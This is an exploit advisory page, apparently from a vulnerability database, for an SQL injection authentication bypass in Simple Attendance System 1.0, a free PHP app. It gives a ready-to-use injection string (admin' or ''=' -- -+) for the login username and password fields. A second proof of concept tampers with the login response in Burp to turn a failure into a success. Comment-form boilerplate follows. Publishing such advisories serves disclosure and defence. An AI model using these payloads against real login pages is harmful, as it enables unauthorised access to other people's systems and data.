Simple Attendance System 1.0 SQL Injection

2021.09.17

Credit: Abdullah Khawaja

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: September 17, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
Simple Attendance System, is prone to multiple vulnerabilities. 
Easy authentication bypass vulnerability on the application 
allowing the attacker to login


----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/attendance/login.php

Username: admin' or ''=' -- -+
Password: admin' or ''=' -- -+


----- PoC-2: Authentication Bypass -----

Steps: 
1. Enter wrong crendentials http://localhost/attendance/login.php
2. Capture the request in burp and send it to repeater.
3. Forward the request.
4. In response tab, replace :
    {"status":"failed","msg":"Invalid username or password."}
                with
    {"status":"success","msg":"Login successfully."}

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Simple Attendance System 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.